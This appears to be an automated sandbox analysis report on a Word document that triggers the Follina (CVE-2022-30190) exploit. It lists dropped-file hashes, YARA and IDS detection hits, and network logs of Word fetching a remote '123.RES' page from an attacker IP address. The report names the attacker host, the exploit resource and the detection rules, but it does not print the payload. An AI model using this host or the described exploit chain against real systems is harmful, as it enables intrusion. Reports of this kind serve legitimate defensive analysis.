        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.22107362032323508
        Encrypted:false
        SSDEEP:48:I3+UrBCvvr0SiJoteSOfgV5Vuz3iCX0kRke:K+CMrkadVdaPme
        MD5:AD8C750FDFC17D93C33BA3087D3FD555
        SHA1:50AE879216EC832CD5250C3D46FD62BB28ABAC32
        SHA-256:D70EF9A7ACC8DDF6827A899E8319116101A55544978060999A23F20BDD4A9334
        SHA-512:893467504A2A40CB35E09E91B0F335E0EEC6C1F0B88B490663753AB3A06312224EABECA3500A8C11CB0890C3C9CC2C5894772163196C74A28AFC19E2BAD67C08
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z.c.2...N....f5-S,...X.F...Fa.q...............................s..zL..f S............w..LvL.6C.....P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):114
        Entropy (8bit):3.954300014527465
        Encrypted:false
        SSDEEP:3:yVlgsRlzIl7hWPYmQSeRSHkKzwINbRlVU276:yPblzIloPLBeUHkfIs22
        MD5:DD3EDE691A56C2D4DFF30FF5C39C0FA5
        SHA1:54F859A53C2215FBF11C0951DB71E2C93FE7EDFC
        SHA-256:38395295006CA6283B2629459D07F44B55D657303E9CEE979933FC9C72EF204A
        SHA-512:BBB5CE1A701CF1E097B9F94DDD7F8418EECD042429F6099707030ABD36D820F5EF32B0EB03F3DA4E2646228D35472A87A961D8B4E5FBA612BEBB6906EDFB0B87
        Malicious:false
        Reputation:low
        Preview:..H..@....b..q....]F.S.D.-.{.6.8.9.4.B.D.7.0.-.C.9.F.6.-.4.E.6.4.-.B.A.1.D.-.6.9.6.1.7.2.C.E.4.3.1.4.}...F.S.D..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
        Category:downloaded
        Size (bytes):5889
        Entropy (8bit):4.705994860110501
        Encrypted:false
        SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
        MD5:EA48F95AB4F3CA3B0C687A726CB00C49
        SHA1:C473DB9C4D460D3F7801B506F289C04A04D3A50F
        SHA-256:CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
        SHA-512:394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
        Malicious:true
        Yara Hits:
        • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, Author: Joe Security
        Reputation:low
        IE Cache URL:http://45.32.185.177/123.RES
        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
        Category:dropped
        Size (bytes):5889
        Entropy (8bit):4.705994860110501
        Encrypted:false
        SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
        MD5:EA48F95AB4F3CA3B0C687A726CB00C49
        SHA1:C473DB9C4D460D3F7801B506F289C04A04D3A50F
        SHA-256:CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
        SHA-512:394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
        Malicious:true
        Yara Hits:
        • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RES, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RES, Author: Joe Security
        Reputation:low
        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
        Category:dropped
        Size (bytes):5889
        Entropy (8bit):4.705994860110501
        Encrypted:false
        SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
        MD5:EA48F95AB4F3CA3B0C687A726CB00C49
        SHA1:C473DB9C4D460D3F7801B506F289C04A04D3A50F
        SHA-256:CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
        SHA-512:394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
        Malicious:true
        Yara Hits:
        • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RES, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RES, Author: Joe Security
        Reputation:low
        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):5632
        Entropy (8bit):2.193335989623885
        Encrypted:false
        SSDEEP:24:rVDNK/njbEOAAneLn7nEWiQA56Be9134oTOAAneLnZnEWiQcm:rVcLYOATiQA56BKRTOA1iQx
        MD5:8B673A3336AF537A8BE96B8EA3048871
        SHA1:CFBCE6835C5B31AE7170F1039BFB2C76002F1DC3
        SHA-256:0F233D976207B3465D4C8BB3B7B8F977B8DA9BF43417A8B42E180A90FB99C2B4
        SHA-512:3CAE8109B4443479DCE7CEADCCC6992C39C46F7A77218570BD27C188FEF0529F7FED61F623DC4F8D555BFC909EF2025356A53D114BF5A77BE61C7B4EC3BCC817
        Malicious:false
        Reputation:low
        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Reputation:high, very likely benign file
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):2130
        Entropy (8bit):1.1455277829933739
        Encrypted:false
        SSDEEP:6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRUlQ/lfEz/RUlQ/lflKDmPm1Pc7:mbb2sOhYk5vnZABylAlY/ylAldIm5
        MD5:06F97D56780E4E8E5E513A038B6D23C5
        SHA1:AC6FD87B383193CAA33E86670AD51B6689A57661
        SHA-256:CF1AAF863CBFFBBB570286E2A20872BED7F36D039E3CE3A9FDCC0ECDBF5ED3B0
        SHA-512:E74962F10214651F89915ED590F2E241BA1B94DA120CCE87866BCF6F9AEA2B7AC532CEE81594F40DA501B66D553F017BC18BD678C2B8F5F702DB9BEC7AA83BD5
        Malicious:false
        Preview:....S.H.A.P.E. .X. .\.*. .M.E.R.G.E.F.O.R.M.A.T... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0...2...6...D...F...D...F...J...N...P.............................................................................................................................................................................................................................................................................................................................................................................................................................j....U....j....U...*....j....U
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.025516343463298688
        Encrypted:false
        SSDEEP:6:I3DPcRoFvxggLRV6AK2RRgJgRXv//4tfnRujlw//+GtluJ/eRuj:I3DPsopAMwyvYg3J/
        MD5:99C66582A073466D851197E61D9E4977
        SHA1:72AD2E75939E0F352912BA79B5CA0F90A8A3F642
        SHA-256:4517A42130351BC4643AEF4246A09D32077F23EBFACEB9A4512E7C44E82C0289
        SHA-512:F9122690748F7C8C473B119FC203DB178FAD01CBB23879C3A9EF1902057E6765049E07E838966E4B50BBBB4413EABF935A5AF532C1D840553C68D29C533A8147
        Malicious:false
        Preview:......M.eFy...z.g@...cJ.......GS,...X.F...Fa.q................................[..F."9..7t...........Rs.WC.....^.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.025638993377216004
        Encrypted:false
        SSDEEP:6:I3DPcC1f5Z97FvxggLR/gtBMMRXv//4tfnRujlw//+GtluJ/eRuj:I3DPv1f5Z9dTgtCAvYg3J/
        MD5:2447DAB5C0393923C0417D2AF4471316
        SHA1:2EAF7E9074AB1AF9F59D7891C3411C1936411953
        SHA-256:C38E53967022743EB7D114B46270D960E0E0B2A9ADF0C8EA1A92FC16BA9078B5
        SHA-512:4E2605ECCD95759397D9ECFF989CB76B6836A63621E8C8EE8D6C6080978F9A4248A9F87C57FE9825CE14FA65AC90F82ECC757C3710C5728E5A04B443E391F6E9
        Malicious:false
        Preview:......M.eFy...z;'wu_.B........S,...X.F...Fa.q...................................A..l..S.5.............9.B..}.........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:55 2022, mtime=Tue Mar 8 15:45:55 2022, atime=Tue Jun 7 23:33:14 2022, length=10142, window=hide
        Category:dropped
        Size (bytes):1004
        Entropy (8bit):4.523969906389643
        Encrypted:false
        SSDEEP:12:8gRgXg/XAlCPCHaXBKBnB/xQpX+Ws2ai84icvbIS2nYla7SNDtZ3YilMMEpxRljM:8o/XTRKJINt8reES/lomDv3q3Y7h
        MD5:D2B1BED3040717B5D022C32C68292CE1
        SHA1:06D6D2EECD5F069300DC1E8D0D2919BFA0503C97
        SHA-256:E7B2E0BC2D533C2854B5C2E5ADF17D643A2DFA419D0F1B8E8D39041ED8578F0C
        SHA-512:960A7C525816FFA978DF78558CA25B93C2353F4C7CDE7239940297879C3A798047FD768E1C586568EA0C1F7514D21883779D5F494A8F0EEAE43A10DCD0E4C75E
        Malicious:false
        Preview:L..................F.... ........3.......3..X.*W.z...'...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....b.2..'...T(. .DOC171~1.DOC..F......hT..hT..*...r.....'...............d.o.c.1.7.1.2...d.o.c.x.......v...............-...8...[............?J......C:\Users\..#...................\\414408\Users.user\Desktop\doc1712.docx.#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.1.7.1.2...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......414408..........D_....3N...W...9...N..... .....[D_....3N...W...9...N..... .....[
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):66
        Entropy (8bit):4.597075278863427
        Encrypted:false
        SSDEEP:3:bDuMJlZVUNzCmxWKVUNzCv:bCSVUDUy
        MD5:2E496A3F1C20211051285A980DADA39A
        SHA1:B980277016A7BCCC0E108CD9A00E82AF61433394
        SHA-256:B466FF5520F73BD086D77160EB4D437F0AA73747604E1318E3BF3C220D218763
        SHA-512:3104FE77ABF38AC191DC43C0BC437017B1A07804238503A6F8D2A3762F48E96E687BF0EB98FEF36E9FFC3451820E6D54BB00AE01B789779CDD10AAE61302E547
        Malicious:false
        Preview:[folders]..Templates.LNK=0..doc1712.LNK=0..[misc]..doc1712.LNK=0..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020303
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
        MD5:1674A1C7C99CD9FAADA789F5E2AEB335
        SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
        SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
        SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020303
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
        MD5:1674A1C7C99CD9FAADA789F5E2AEB335
        SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
        SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
        SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...
        File type:Microsoft OOXML
        Entropy (8bit):7.869586027326007
        TrID:
        • Word Microsoft Office Open XML Format document (49504/1) 49.01%
        • Word Microsoft Office Open XML Format document (43504/1) 43.07%
        • ZIP compressed archive (8000/1) 7.92%
        File name:doc1712.docx
        File size:10142
        MD5:7a91b01a037ccbfe6589161643d0a65a
        SHA1:53658a5b5bc577d601e23ae77a34cb44dcba1f27
        SHA256:f17f5c8eac3a18c961705a61385e1d2894cc8f22fb33aa3e076a40b826384c60
        SHA512:f1accdbe0ea88f717f7473818df6ee72fc77077c1a145bb872863bb0bb681cb59b653dd6927e68fd2b9e8942b7498c5e7e8ab26c8d0aece3c9fcc21e580ad100
        SSDEEP:192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ7S/bQ7dlJ78:snPj8I10lD9+2Vvxm/bqlJ78
        TLSH:29229E36D65508B1CAD7A279E0AC1A19E30C41BBA37BE9CB61C663E412C86DF0F5530C
        File Content Preview:PK.........k.T...L....'.......[Content_Types].xml...n.0.E....m.NR....,.X...~...`.l.....C ......l....sg..'.m..kp^...Q4d...H..1.X...,.(.......x6..L.;.>.b.c.!...}.A!|d,h.....i.....K,....;....1.R.M'O..U....^WF.....Ub....6W.@.....(aM..r..3e....?J(#....7..S...p
        Icon Hash:e4e6a2a2a4b4b4a4
        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
        45.32.185.177192.168.2.2280491762036726 06/07/22-17:33:41.296228TCP2036726ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)804917645.32.185.177192.168.2.22
        TimestampSource PortDest PortSource IPDest IP
        Jun 7, 2022 17:33:28.018767118 CEST4917380192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:28.041985989 CEST804917345.32.185.177192.168.2.22
        Jun 7, 2022 17:33:28.042093992 CEST4917380192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:28.042892933 CEST4917380192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:28.065942049 CEST804917345.32.185.177192.168.2.22
        Jun 7, 2022 17:33:28.066274881 CEST804917345.32.185.177192.168.2.22
        Jun 7, 2022 17:33:28.066356897 CEST4917380192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:33.067442894 CEST804917345.32.185.177192.168.2.22
        Jun 7, 2022 17:33:33.067533016 CEST4917380192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:33.984051943 CEST4917480192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:34.007215023 CEST804917445.32.185.177192.168.2.22
        Jun 7, 2022 17:33:34.007349968 CEST4917480192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:34.007536888 CEST4917480192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:34.030474901 CEST804917445.32.185.177192.168.2.22
        Jun 7, 2022 17:33:34.030771017 CEST804917445.32.185.177192.168.2.22
        Jun 7, 2022 17:33:34.238008022 CEST4917480192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:34.256355047 CEST804917445.32.185.177192.168.2.22
        Jun 7, 2022 17:33:34.256531000 CEST4917480192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:38.161386013 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:38.184550047 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:38.184705973 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:38.184900045 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:38.207914114 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:38.208200932 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:38.419167995 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:38.436250925 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:38.436436892 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:39.031132936 CEST804917445.32.185.177192.168.2.22
        Jun 7, 2022 17:33:39.031232119 CEST4917480192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:39.031289101 CEST4917480192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:39.054394960 CEST804917445.32.185.177192.168.2.22
        Jun 7, 2022 17:33:39.330252886 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:39.353648901 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:39.353693008 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:39.558034897 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:39.580319881 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:39.580566883 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:41.189172983 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:41.212749958 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:41.212960005 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:41.242566109 CEST4917380192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:41.243115902 CEST4917680192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:41.265652895 CEST804917345.32.185.177192.168.2.22
        Jun 7, 2022 17:33:41.265860081 CEST804917645.32.185.177192.168.2.22
        Jun 7, 2022 17:33:41.265966892 CEST4917680192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:41.273190975 CEST4917680192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:41.295975924 CEST804917645.32.185.177192.168.2.22
        Jun 7, 2022 17:33:41.296227932 CEST804917645.32.185.177192.168.2.22
        Jun 7, 2022 17:33:41.296260118 CEST804917645.32.185.177192.168.2.22
        Jun 7, 2022 17:33:41.296288013 CEST804917645.32.185.177192.168.2.22
        Jun 7, 2022 17:33:41.296314001 CEST4917680192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:41.296315908 CEST804917645.32.185.177192.168.2.22
        Jun 7, 2022 17:33:41.296334028 CEST4917680192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:41.296344042 CEST804917645.32.185.177192.168.2.22
        Jun 7, 2022 17:33:41.296374083 CEST4917680192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:41.296389103 CEST4917680192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:41.430147886 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:41.440367937 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:41.440541029 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:42.952044010 CEST4917680192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:42.974982023 CEST804917645.32.185.177192.168.2.22
        Jun 7, 2022 17:33:42.975111008 CEST804917645.32.185.177192.168.2.22
        Jun 7, 2022 17:33:42.975275993 CEST4917680192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:43.084708929 CEST4917780192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:43.107714891 CEST804917745.32.185.177192.168.2.22
        Jun 7, 2022 17:33:43.107907057 CEST4917780192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:43.125586987 CEST4917780192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:43.148494959 CEST804917745.32.185.177192.168.2.22
        Jun 7, 2022 17:33:43.148684025 CEST804917745.32.185.177192.168.2.22
        Jun 7, 2022 17:33:43.395939112 CEST804917745.32.185.177192.168.2.22
        Jun 7, 2022 17:33:43.396003962 CEST4917780192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:43.396056890 CEST4917780192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:44.479470015 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:44.502660036 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:44.502847910 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:44.706597090 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:44.728271961 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:44.728430033 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:45.477780104 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:45.501329899 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:45.540532112 CEST4917680192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:45.563441038 CEST804917645.32.185.177192.168.2.22
        Jun 7, 2022 17:33:45.563630104 CEST804917645.32.185.177192.168.2.22
        Jun 7, 2022 17:33:45.563802004 CEST4917680192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:45.720526934 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:45.728183031 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:45.728290081 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:45.771857023 CEST4917680192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:45.794635057 CEST804917645.32.185.177192.168.2.22
        Jun 7, 2022 17:33:45.794852018 CEST804917645.32.185.177192.168.2.22
        Jun 7, 2022 17:33:45.794971943 CEST4917680192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:48.150402069 CEST804917745.32.185.177192.168.2.22
        Jun 7, 2022 17:33:48.150511026 CEST4917780192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:48.151854038 CEST4917780192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:48.175110102 CEST804917745.32.185.177192.168.2.22
        Jun 7, 2022 17:33:50.505388021 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:50.505740881 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:50.505805016 CEST4917580192.168.2.2245.32.185.177
        Jun 7, 2022 17:33:50.529305935 CEST804917545.32.185.177192.168.2.22
        Jun 7, 2022 17:33:50.797528028 CEST804917645.32.185.177192.168.2.22
        • 45.32.185.177
        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.224917345.32.185.17780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        Jun 7, 2022 17:33:28.042892933 CEST1OUTOPTIONS / HTTP/1.1
        User-Agent: Microsoft Office Protocol Discovery
        Host: 45.32.185.177
        Content-Length: 0
        Connection: Keep-Alive
        Jun 7, 2022 17:33:28.066274881 CEST2INHTTP/1.1 200 OK
        Date: Tue, 07 Jun 2022 15:33:28 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Allow: GET,POST,OPTIONS,HEAD
        Content-Length: 0
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/html


        Session IDSource IPSource PortDestination IPDestination PortProcess
        1192.168.2.224917445.32.185.17780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        Jun 7, 2022 17:33:34.007536888 CEST3OUTHEAD /123.RES HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft Office Existence Discovery
        Host: 45.32.185.177
        Jun 7, 2022 17:33:34.030771017 CEST3INHTTP/1.1 200 OK
        Date: Tue, 07 Jun 2022 15:33:34 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
        ETag: "1701-5e0db72a43821"
        Accept-Ranges: bytes
